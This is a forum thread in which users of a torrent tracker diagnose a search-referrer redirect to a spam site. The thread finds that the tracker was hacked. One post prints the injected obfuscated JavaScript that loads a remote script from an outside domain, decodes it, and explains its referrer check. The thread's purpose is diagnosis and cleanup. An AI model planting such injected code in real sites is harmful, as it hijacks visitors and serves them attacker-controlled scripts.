It seems avast is aborting the connection for me when I go in through Google. I'm not sure exactly why it's doing it. It's not sending anything malicious. I checked to see if it was the page compression that's done and so I turned it off, but it still was giving the gzip malware warning and aborting the connection.

I actually checked what Google had to say about the page and they said it was clean. Turns out my antivirus is blocking the page. Nothing seems to be wrong with it though.

Sorry, for the bump, but I noticed that the redirect to that page is still happening, however there are a couple of parameters:

1. It only show the ads once, unless the cache is cleaned. I had it once before, and it never happened again until today, when I ran CCleaner.
2. It only happen on the tracker page, no exception.
3. It happens on my phone as well, so it rules out Browser Hijacker, and DNS poisoning.

I'd look over your code, since there was a hijacker like this one infecting boards using VBulletin(file2store.info). It was exactly like this one, only happening once per website per browser.

And you're using http://tracker.tvnihon.com/ to access the tracker?

Edit: Just tested it on my itouch and no redirect. You're either using a url that's bad or you have viruses on all your stuff.

I just did some test now and it narrows down to clicking the google link. If I go straight to tracker.tvnihon.com right after clearing my cache, no problem. If I go through google - instant redirect.

Does it happen when you click on any other google link? Sounds like you've got a hijacker to me, same thing happened to me once.

No, I get it too when I click on the google link. Huh

Edit: I can't duplicate it, but my history definitely says I went to
http://thailand.needed4.info/

Something must be screwy with the google redirect. Just bookmark the tracker or use the link on our main page: http://www.tvnihon.com. If you go there frequently enough a decent browser should autocomplete the url anyway

Edit edit: For more info, I was on a laptop with a wifi connection when this happened. I haven't reproduced it on my desktop with its hard connection. Luna also had this happen when she was on her laptop with wifi.

Be careful if you got any redirect like that. Once I got that (from 9web or something), it won't leave my PC for months untill I do fully scanned in safe mode.

Normal scan with Ccleaner may remove it temporarily, but they will stick to your computer until you access another specific link........

I'd suggest boot your computer to safe mode, and run deep scan from there to ensure the malware remove successfully.

Did a whois look up, that domain is registered under DomainsByProxy.com, which is an anonymous domain registration service. I think you can do a report and they'll take the offending domain down(anti spam policy). I'm using Linux, so that eliminate pretty much any virus. I'd have a look at your host, this is suspiciously similar to that forum hijacker I mentioned(file2store). It hides through base64 code, written on top of every PHP file.

Bad news gang:

The tracker has been compromised.

Preface: I have a clean virtual machine dedicated to website debugging (we use it to find the source of bad 3rd party ads), so I've used it to debug the odd redirect on the tracker. I am 110% sure that the virtual machine is clean and that it is faithfully displaying any and all websites

There are two segments of Javascript being served up by the tracker:

Code:

<script type="text/javascript">var _0x7c8f=["\x72\x65\x66\x65\x72\x72\x65\x72","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x73\x65\x61\x72\x63\x68\x2E\x6C\x69\x76\x65\x2E\x63\x6F\x6D","\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65","\x73\x65\x61\x72\x63\x68\x2E\x79\x61\x68\x6F\x6F\x2E\x63\x6F\x6D","\x77\x77\x77\x2E\x62\x69\x6E\x67\x2E\x63\x6F\x6D","\x79\x61\x6E\x64\x65\x78\x2E\x72\x75","\x69\x6E\x64\x65\x78\x4F\x66","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x61\x76\x61\x6C\x69\x6B\x2E\x69\x6E\x66\x6F\x2F\x6A\x73\x2F\x6A\x73\x2E\x70\x68\x70\x3F\x6C\x3D","\x26\x72\x3D","\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];if(document[_0x7c8f[0x0]]&&document[_0x7c8f[0x1]]){var s=[_0x7c8f[0x2],_0x7c8f[0x3],_0x7c8f[0x4],_0x7c8f[0x5],_0x7c8f[0x6]];var r=document[_0x7c8f[0x0]];var l=document[_0x7c8f[0x1]];for(var i in s){if(r[_0x7c8f[0x7]](s[i])!=-0x1){document[_0x7c8f[0xb]](_0x7c8f[0x8]+escape(l)+_0x7c8f[0x9]+escape(r)+_0x7c8f[0xa]);break ;} ;} ;} ;</script>


<script src="http://avalik.info/js/js.php?l=http%3A//tracker.tvnihon.com/&r=http%3A//www.google.com/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26frm%3D1%26source%3Dweb%26cd%3D1%26ved%3D0CFAQFjAA%26url%3Dhttp%253A%252F%252Ftracker.tvnihon.com%252F%26ei%3Dbd4UUJW0E5L-rAHrroG4CA%26usg%3DAFQjCNFHkioqc7sROVp7EdjPGU8EXkKAqA" type="text/javascript"></script>

The former is the payload, and the latter in this case is generated based on your referrer, which in turn is what gets executed to fetch the final off-site payload. Since I doubt anyone here speaks escaped Javascript, here's the meaty bits:



In short, the two scripts are working together to check your referrer, and if it's from one of a number of search sites, it then fetches an additional script from avalik.info and executes it.

I have not been able to directly capture the script from avalik.info, but jsunpack (a service dedicated to unpacking Javascript) has it. Decoding that Javascript gives us the following: document.location='http://thailand.needed4.info/';

So there you go. Those scripts are directly responsible for the redirect, and in turn they are being directly served by the tracker. The only reason you don't see them every time you visit the tracker is because of the referrer check and because the site on the other end is setting cookies to keep track of whether you've already been. So it's only first-time visitors coming from a search site that are compromised.

So yeah; someone has hacked the tracker, and while it probably won't result in malware (the bastards seem to be using it for spam purposes), it would likely be a good idea to take the tracker down anyhow in order to clean it and patch it. The version of the tracker looks very old, so there's probably a number of known exploits, which is how the attackers got in.

Furthermore if that tracker package is using SQL, I'd be highly concerned that this isn't the only thing that was compromised. An SQL compromise could very well be used to pull the user table from the forums (if they're hosted on the same SQL server), which means passwords and such could be at risk.

Finally, for Take & crew, if I had to take a guess where the offening code was, I'd check the templates for the tracker software. Since this bad code is being served by every tracker page, it's almost certainly in the master page template.

http://exploitsdownload.com/search/source%20bans/1 -I'd take a look at that, the source said its written by someone at avalik.info

i don't know if ti is worth saying this by this time, but, a few years ago, when i used another anti-virus (Anti-Malware, that's the name of the antivirus BTW), it blocked me tvnihon.com completely. Never knew why and around that time i was less social in the interwebs so i didn't say anything in here, just made a few modifications in the exclude list and voila

Anyway, sorry for not taking you serious sooner Bussani. Maybe we could have resolved this a lot sooner than we did.

I was wondering what was wrong. Same thing happened to me last week but I didn't really got into it as when I clicked on it for the second time, everything was fine.

I guess I will have to settle for Hiromi Miyake Weightlifting videos.

I have a bookmark for both the news page and the tracker page, I didn't even realize there was a problem with the tracker until it got to the news page...

My usual pc decided to die, so I had to replace some hardware.
Meanwhile I used an old backup one where I have zero useful programs and/or links (it barely runs the OS plus some vital software)
I tried to resume some of the torrents and the link from google was blocked.

Now that I got my pc back, the tracker is down
(well... I can get some Decade from the DLL)

Good luck on the new one!